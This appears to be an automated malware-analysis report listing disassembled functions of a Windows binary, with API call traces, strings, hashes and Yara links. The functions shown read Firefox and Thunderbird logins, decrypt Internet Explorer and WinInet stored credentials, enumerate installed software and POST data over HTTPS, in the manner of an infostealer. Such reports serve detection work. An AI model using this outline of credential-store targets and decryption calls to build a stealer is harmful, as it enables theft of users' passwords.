                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$NameSystemUser$DevicesDisplayEnumInfoMetrics$CloseComputerDefaultGlobalLocaleMemoryOpenQueryStatusValue_strftime
                                                                                                    • String ID: )!$ :TN$!;$(EJ( $)vl$+Hdd$.$/Ifc$/L_Z$00$0000$0000$1+$2'6i$2p]F$3>58$4L$5/$9}<)$:$@$F"#5-2)6$FPFY$JSRO$KKFK";QK$Qt$USED$V\$Wed Sep 8 00:01:38 2021$XLJH$Z$`bnx$aaaaaaaaaaaaa$am$g}$isut$j|5/$m{$qt$rRR_R 3?HR$s$t5q|$tcu/$v$x$x
                                                                                                    • API String ID: 3358139242-950190238
                                                                                                    • Opcode ID: 5627f962eff4ac5fd40bbf4c93766949d76b5cead170ca96471c899b358139dd
                                                                                                    • Instruction ID: dd1f520b829340a486540dcb48aec28350ce5d403088cebc98d7579fb37bcb2b
                                                                                                    • Opcode Fuzzy Hash: 5627f962eff4ac5fd40bbf4c93766949d76b5cead170ca96471c899b358139dd
                                                                                                    • Instruction Fuzzy Hash: A3B2D0309083988ACF25DB7588957EDBB71AF1A304F0045EED4897B242EB781F89CF59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0043628C, Relevance: 90.3, APIs: 37, Strings: 14, Instructions: 1081registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00436291
                                                                                                      • Part of subcall function 0043922A: __EH_prolog.LIBCMT ref: 0043922F
                                                                                                      • Part of subcall function 00435C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000001), ref: 00435CB7
                                                                                                      • Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
                                                                                                      • Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C
                                                                                                    • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,00000000,0000000A,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040), ref: 0043638B
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436398
                                                                                                    • RegEnumKeyExW.KERNEL32(?,00000000,?,00000800,00000000,00000000,00000000,00000000,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012), ref: 004363D1
                                                                                                    • wsprintfW.USER32 ref: 004363F9
                                                                                                    • RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020019,00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436418
                                                                                                    • RegQueryValueExA.KERNEL32(00000076,?,00000000,000F003F,?,00000800,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436494
                                                                                                    • RegQueryValueExA.KERNEL32(00000076,?,00000000,000F003F,?,00000800,?,?,?,00000001,?,?,?,?,?,0048A6F8), ref: 00436639
                                                                                                    • RegCloseKey.ADVAPI32(00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 0043671A
                                                                                                    • RegCloseKey.ADVAPI32(00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436739
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 0043673E
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436743
                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 0043675A
                                                                                                    • RegEnumKeyExW.KERNEL32(?,00000000,?,00000800,00000000,00000000,00000000,00000000,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012), ref: 00436788
                                                                                                    • wsprintfW.USER32 ref: 004367B0
                                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 004367CF
                                                                                                    • RegQueryValueExA.ADVAPI32(00000076,?,00000000,000F003F,?,00000800,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 0043684B
                                                                                                    • RegQueryValueExA.ADVAPI32(00000076,?,00000000,000F003F,?,00000800,?,00000001,?,00000001,?,?,?,?,?,0048A6F8), ref: 004369DF
                                                                                                    • RegCloseKey.ADVAPI32(00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436AC0
                                                                                                    • RegCloseKey.ADVAPI32(00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436ADF
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436AE4
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436AE9
                                                                                                    • RegOpenKeyExW.KERNEL32(80000003,0047D410,00000000,00020019,?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436B03
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436B13
                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00436B3D
                                                                                                    • RegEnumKeyExW.KERNEL32(?,00000001,?,00000800,00000000,00000000,00000000,00000000,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012), ref: 00436B85
                                                                                                    • wsprintfW.USER32 ref: 00436BB0
                                                                                                    • RegOpenKeyExW.KERNEL32(80000003,?,00000000,00020019,?,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436BCF
                                                                                                    • RegEnumKeyExW.KERNEL32(?,00000000,?,283C115D,00000000,00000000,00000000,00000000,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040), ref: 00436C0B
                                                                                                    • wsprintfW.USER32 ref: 00436C3B
                                                                                                    • RegOpenKeyExW.ADVAPI32(80000003,?,00000000,00020019,?,?,?,?,?,?,?,?,?,00438A36,00000000,00000012), ref: 00436C5A
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00438A36,00000000,00000012,00000040,00000001), ref: 00436C67
                                                                                                    • RegQueryValueExA.ADVAPI32(?,tcu/,00000000,000F003F,?,00000800,?,?,?,?,?,?,?,?,00438A36,00000000), ref: 00436CE4
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436F90
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 0043716C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Close$Open$QueryValue$Enumwsprintf$H_prolog$EnvironmentIos_base_dtorVariable_strcatstd::ios_base::_
                                                                                                    • String ID: $!eHRQM@Xo@LD$%s\%s$/$<8$3$3>589}<)g}$6`_ECWZ$8$?$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$k$kKC$k`x|$|9
                                                                                                    • API String ID: 2335028583-1150690332
                                                                                                    • Opcode ID: 2a59be8a47ee9a41f8a7594b8200d1d9fc7bd8c9e7871d0af12e912cad57f255
                                                                                                    • Instruction ID: 91b8013d12c5bab7949268fbb79717665483f54acc398f6523401afbc0a33be3
                                                                                                    • Opcode Fuzzy Hash: 2a59be8a47ee9a41f8a7594b8200d1d9fc7bd8c9e7871d0af12e912cad57f255
                                                                                                    • Instruction Fuzzy Hash: 56A2D170D0425D9EDF25CFA4CC81BEEBBB4AF19304F1081AEE449B7242DB744A89CB59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00433882, Relevance: 65.3, APIs: 34, Strings: 3, Instructions: 569filestringmemoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00433887
                                                                                                    • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00433B2C
                                                                                                    • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00433BAB
                                                                                                    • WriteFile.KERNEL32(00000000,?,00000010,?,00000000), ref: 00433BBE
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00433BC5
                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00433BD9
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00433BE8
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000800), ref: 00433BF9
                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00433C00
                                                                                                    • lstrlenA.KERNEL32 ref: 00433C17
                                                                                                    • lstrcpynA.KERNEL32(00000000,00000001), ref: 00433C2C
                                                                                                    • lstrlenA.KERNEL32(?), ref: 00433C39
                                                                                                    • lstrcpynA.KERNEL32(?,?,00000001), ref: 00433C48
                                                                                                    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00433C5F
                                                                                                    • lstrlenA.KERNEL32(?), ref: 00433C75
                                                                                                    • lstrcpynA.KERNEL32(?,?,00000001), ref: 00433C88
                                                                                                    • WinHttpSetOption.WINHTTP(00000000,00000000,00000000,00000000,00000000), ref: 00433C99
                                                                                                    • WinHttpSetOption.WINHTTP(00000000,00000006,?,00000004), ref: 00433CBA
                                                                                                    • WinHttpSetOption.WINHTTP(00000000,00000005,000F4240,00000004), ref: 00433CC5
                                                                                                    • WinHttpConnect.WINHTTP(00000000,00000000,000001BB,00000000,?), ref: 00433D58
                                                                                                      • Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C
                                                                                                    • WinHttpOpenRequest.WINHTTP(00000000,POST,00000000,00000000,00000000,00000000,00800100,?), ref: 00433E48
                                                                                                    • WinHttpOpenRequest.WINHTTP(00000000,POST,00000000,00000000,00000000,00000000,00000100,?), ref: 00433EB6
                                                                                                    • WinHttpSendRequest.WINHTTP(00000000,00000000,000000FF,00000008,?,?,00000000,?), ref: 00433F26
                                                                                                    • WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 00433F4E
                                                                                                    • WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 00433F64
                                                                                                    • WinHttpReadData.WINHTTP(00000000,00000000,?,?), ref: 00433F99
                                                                                                      • Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000,00000002,00000080), ref: 00438C85
                                                                                                      • Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000), ref: 00438CCC
                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000), ref: 00434048
                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000), ref: 00434052
                                                                                                    • CloseHandle.KERNEL32(?), ref: 0043405B
                                                                                                    • DeleteFileA.KERNEL32(?), ref: 00434064
                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000), ref: 0043406B
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000010), ref: 00434075
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0043407C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Http$File$CloseHandle$Heap$OptionRequestlstrcpynlstrlen$ByteCharCreateDataDeleteMultiOpenProcessReadWide$AllocAvailableConnectDeallocateFreeH_prologQueryReceiveResponseSendSizeWrite
                                                                                                    • String ID: %[^:]://%[^/]%[^]$POST$https
                                                                                                    • API String ID: 2264578430-666396942
                                                                                                    • Opcode ID: 6a731004732ecfec4ad9bad44e93470bbb2f7a7e078453526e12d4c2773ff676
                                                                                                    • Instruction ID: 268c877f1b69af4e096e1ece1c9e45decc44a1bdff283dbd08e4261261832945
                                                                                                    • Opcode Fuzzy Hash: 6a731004732ecfec4ad9bad44e93470bbb2f7a7e078453526e12d4c2773ff676
                                                                                                    • Instruction Fuzzy Hash: BD32BB70E002589FDB21DFA5CD85AEEBBB4BF09304F0041AEE449A7251EB745E85CF5A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0042A2F9, Relevance: 58.2, APIs: 28, Strings: 5, Instructions: 434stringlibraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetVersionExW.KERNEL32(?), ref: 0042A341
                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 0042A395
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0042A3E2
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0042A41E
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0042A45E
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0042A499
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0042A4D5
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0042A50E
                                                                                                    • lstrlenW.KERNEL32(?), ref: 0042A5D1
                                                                                                    • lstrcpyW.KERNEL32 ref: 0042A5EC
                                                                                                    • lstrlenW.KERNEL32(?), ref: 0042A5F9
                                                                                                    • lstrcpyW.KERNEL32 ref: 0042A618
                                                                                                    • lstrlenW.KERNEL32(?), ref: 0042A625
                                                                                                    • lstrcpyW.KERNEL32 ref: 0042A649
                                                                                                    • lstrlenW.KERNEL32(?), ref: 0042A67D
                                                                                                    • lstrcpyW.KERNEL32 ref: 0042A69E
                                                                                                    • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 0042A7B5
                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 0042A7C0
                                                                                                    • lstrlenW.KERNEL32(?), ref: 0042A7D0
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0042A85E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProclstrlen$lstrcpy$Library$FreeLoadVersion
                                                                                                    • String ID: vAULTgETiTEM$%$Internet Explorer$RCKU$^(?+2*=27p:22
                                                                                                    • API String ID: 4222390991-95504026
                                                                                                    • Opcode ID: 9b8114f70002599139ab2fb6433f79d06eaf3614917738f0fca7b371563a96d6
                                                                                                    • Instruction ID: ee027e3256dc64104db3165579ce757a5594af22ad4575cabb0489d1c635360c
                                                                                                    • Opcode Fuzzy Hash: 9b8114f70002599139ab2fb6433f79d06eaf3614917738f0fca7b371563a96d6
                                                                                                    • Instruction Fuzzy Hash: EBF19E71E002689FDF14DFA8DC48BEEBBB8EF49304F10446AE805E7211D7789955CB5A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0042E110, Relevance: 55.3, APIs: 11, Strings: 19, Instructions: 2823COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: swprintf
                                                                                                    • String ID: ,$/$7$:$:$<$C$H$N$Q$V$Z$\$_$f$h$s$v$}
                                                                                                    • API String ID: 233258989-3288149934
                                                                                                    • Opcode ID: 5f7e91b097694029ea192cf6159db2fd55ccccdfe093a9f8ad1ecce217e0012d
                                                                                                    • Instruction ID: 475275c1d7ed544704e005971488929d6d053b4d6a4e5fceb10a333dc0c0ff90
                                                                                                    • Opcode Fuzzy Hash: 5f7e91b097694029ea192cf6159db2fd55ccccdfe093a9f8ad1ecce217e0012d
                                                                                                    • Instruction Fuzzy Hash: 97439F34D052A99ACF25F765DC52BEDBBB05F25308F0004DEA65973293DA782B88CF19
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004210B1, Relevance: 50.3, APIs: 7, Strings: 21, Instructions: 1335COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 004210B6
                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000001,00000000), ref: 004210EB
                                                                                                      • Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
                                                                                                      • Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C
                                                                                                      • Part of subcall function 0040AC66: __EH_prolog.LIBCMT ref: 0040AC6B
                                                                                                      • Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64
                                                                                                    • NSS_Init.NSS3(?,?,?,?,?,?), ref: 0042124D
                                                                                                    • NSS_Shutdown.NSS3(?,00000001,?,00000001,?,?,?), ref: 004225EB
                                                                                                      • Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C
                                                                                                    • sqlite3_finalize.NSS3(?), ref: 004218A4
                                                                                                    • sqlite3_close.NSS3(?), ref: 004218B1
                                                                                                    • __fread_nolock.LIBCMT ref: 00421AB2
                                                                                                      • Part of subcall function 00427160: __EH_prolog.LIBCMT ref: 00427165
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$Deallocate$FolderInitPathShutdown__fread_nolock_strcatsqlite3_closesqlite3_finalize
                                                                                                    • String ID: %$&NIURHGKC$*-0$*LEX$1'$2:$6rkw$:,$<4$>6$F )4$Gy_H$Profiles$RD$ThunderBird$W9#$c.,9$logins$nt{w$v$xf
                                                                                                    • API String ID: 1928370683-529884781
                                                                                                    • Opcode ID: 53ecec49495264a027739179c8fa0ac2edf784c502195386b57ac546a197f261
                                                                                                    • Instruction ID: 7cf0c16e80d84c1340ed0f8113b1c6eecb7c157959f31b42812db283f23df99d
                                                                                                    • Opcode Fuzzy Hash: 53ecec49495264a027739179c8fa0ac2edf784c502195386b57ac546a197f261
                                                                                                    • Instruction Fuzzy Hash: E2D29A70E002A88BCB25DF69D990BEDBBB1AF19304F5041EED409A7252DB785F85CF58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004206DD, Relevance: 40.9, APIs: 15, Strings: 8, Instructions: 607libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 004206E2
                                                                                                      • Part of subcall function 00435C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000001), ref: 00435CB7
                                                                                                      • Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
                                                                                                      • Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C
                                                                                                    • SetCurrentDirectoryA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00000000), ref: 004208B8
                                                                                                      • Part of subcall function 00420568: __EH_prolog.LIBCMT ref: 0042056D
                                                                                                    • LoadLibraryA.KERNEL32(00000000,?,00000000,00000000), ref: 00420BB1
                                                                                                    • GetProcAddress.KERNEL32(00000000,orr~hOHU), ref: 00420BFE
                                                                                                    • GetProcAddress.KERNEL32(00000000,575B5B46), ref: 00420C3E
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00420C7A
                                                                                                    • GetProcAddress.KERNEL32(00000000,QJ00F[[W), ref: 00420CBB
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00420CEF
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00420D1D
                                                                                                    • GetProcAddress.KERNEL32(00000000,F[[W[`}|1.;0), ref: 00420D5C
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00420D8C
                                                                                                    • GetProcAddress.KERNEL32(00000000,44415C5E), ref: 00420DCA
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00420E08
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00420E38
                                                                                                    • GetProcAddress.KERNEL32(00000000,2A2F3230), ref: 00420E77
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$H_prolog$CurrentDirectoryEnvironmentLibraryLoadVariable_strcat
                                                                                                    • String ID: /,0$&$02/*$4du`|$FaOS$QJ00F[[W$orr~hOHU$yFE^
                                                                                                    • API String ID: 1501777685-1778109498
                                                                                                    • Opcode ID: 7c4ad75b79ed22d52f3350d44af3a02b8997207e4a0705c850199b4f07040677
                                                                                                    • Instruction ID: 3ceee775c1db2101e3abe91b8041793fdedad25dba46125a77d36f99286f4ace
                                                                                                    • Opcode Fuzzy Hash: 7c4ad75b79ed22d52f3350d44af3a02b8997207e4a0705c850199b4f07040677
                                                                                                    • Instruction Fuzzy Hash: 1132F330E01298CFDB01DBA9D9947EEBBF4AF19304FA4086ED441A7253DB784A85CB5D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00429F5D, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 169encryptionstringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,?,00000000), ref: 00429F82
                                                                                                    • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,00000000,?,00000000), ref: 00429FA3
                                                                                                    • lstrlenW.KERNEL32(?,?,00000000), ref: 00429FB2
                                                                                                    • CryptHashData.ADVAPI32(00000000,?,00000000,00000000,?,00000000), ref: 00429FC5
                                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000002,?,?,00000000,?,00000000), ref: 00429FE8
                                                                                                    • wsprintfW.USER32 ref: 0042A024
                                                                                                    • lstrcatW.KERNEL32(00000000,?), ref: 0042A032
                                                                                                    • wsprintfW.USER32 ref: 0042A052
                                                                                                    • lstrcatW.KERNEL32(00000000,?), ref: 0042A060
                                                                                                    • CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 0042A069
                                                                                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,00000000), ref: 0042A074
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 0042A0BB
                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,0042A2AF,00000000,00000000,00000001,?), ref: 0042A0DE
                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0042A117
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Crypt$Hash$ContextDatalstrcatlstrlenwsprintf$AcquireCreateDestroyFreeLocalParamReleaseUnprotect
                                                                                                    • String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                                                                    • API String ID: 1004607082-2450551051
                                                                                                    • Opcode ID: 6439d65f7729c76b50c974d5be1b8a2cdfa08e6978128d092fcff3fe38d753c0
                                                                                                    • Instruction ID: 005e14ebd307acc44d900abe414c883e19f5054360f72cf190598c62f8d9df29
                                                                                                    • Opcode Fuzzy Hash: 6439d65f7729c76b50c974d5be1b8a2cdfa08e6978128d092fcff3fe38d753c0
                                                                                                    • Instruction Fuzzy Hash: 82514171E00219AFDB119FA4EC45FFF77BCAF44304F14402AE905E2151EAB89A15CB69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0043E2E4, Relevance: 19.7, APIs: 8, Strings: 3, Instructions: 469COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: /$UT$in-gdi-devcaps-l1-1-0
                                                                                                    • API String ID: 0-3985708853
                                                                                                    • Opcode ID: ca04ac2f96e5848d747f8de154aac6de5694c76c4c834d83011a6bda12b6f8ca
                                                                                                    • Instruction ID: 76826b07e805f1e516683311a4db4d08ba6e9d74c9be735415875e9b36247458
                                                                                                    • Opcode Fuzzy Hash: ca04ac2f96e5848d747f8de154aac6de5694c76c4c834d83011a6bda12b6f8ca
                                                                                                    • Instruction Fuzzy Hash: 8E02B071A093819FD714DF2AD4807ABB7E4BF99304F14182EF98583391D738D859CB9A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0042A130, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 97stringencryptionCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(?), ref: 0042A156
                                                                                                    • lstrlenW.KERNEL32(00000002), ref: 0042A167
                                                                                                    • CredEnumerateW.SECHOST(Microsoft_WinInet_*,00000000,00000000,?), ref: 0042A190
                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000001,?), ref: 0042A1D6
                                                                                                    • LocalFree.KERNEL32(?), ref: 0042A200
                                                                                                    • CredFree.ADVAPI32(?), ref: 0042A219
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CredFreelstrlen$CryptDataEnumerateLocalUnprotect
                                                                                                    • String ID: J$Microsoft_WinInet_*$abe2869f-9b47-4cd9-a358-c22904dba7f7
                                                                                                    • API String ID: 186292201-3120203912
                                                                                                    • Opcode ID: 55992ff89825beb77247bf315440d94e0371b3fb6d0cb9b06891a6d9543f6d9e
                                                                                                    • Instruction ID: 19e365c0e672387ba2505b807b813ee5e5cbdbe09d4aa82ca4ca5ffd792269d9
                                                                                                    • Opcode Fuzzy Hash: 55992ff89825beb77247bf315440d94e0371b3fb6d0cb9b06891a6d9543f6d9e
                                                                                                    • Instruction Fuzzy Hash: 7A315771E00218EBCB20DF95E844DEFBBB8FB84700F50416AE812E3241E7759A11DB65
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041FD36, Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 404timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0041EFFF: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0041F1EE,00000002,?,00000000,00000244,?,?,0041F321,?,00000000,00000244), ref: 0041F032
                                                                                                    • _strcat.LIBCMT ref: 0041FEA9
                                                                                                    • _strcat.LIBCMT ref: 0041FF24
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,000007BC), ref: 00420079
                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00420099
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileTime$_strcat$LocalPointerSystem
                                                                                                    • String ID: /../$/..\$\../$\..\
                                                                                                    • API String ID: 3418985325-3885502717
                                                                                                    • Opcode ID: 9a834d055a0211018dba5b1dadd4b08083c9029bc8dacd7e18ae1799699da538
                                                                                                    • Instruction ID: b00080852119e3309c6e69affa03d4f88f3d8ac799483f1e808ff3a2e1d6d61c
                                                                                                    • Opcode Fuzzy Hash: 9a834d055a0211018dba5b1dadd4b08083c9029bc8dacd7e18ae1799699da538
                                                                                                    • Instruction Fuzzy Hash: 01E1E2715087418BD315CF29C4806E7BBE0AF89314F548A2FE4A9C7342D779D98ACB9A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004373C6, Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 349registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 004373CB
                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?,?,?), ref: 0043746F
                                                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,?,?), ref: 004374BD
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 004374C6
                                                                                                      • Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseDeallocateH_prologOpenQueryValue
                                                                                                    • String ID: Y+6$wEGGOW%E
                                                                                                    • API String ID: 2130659939-258343349
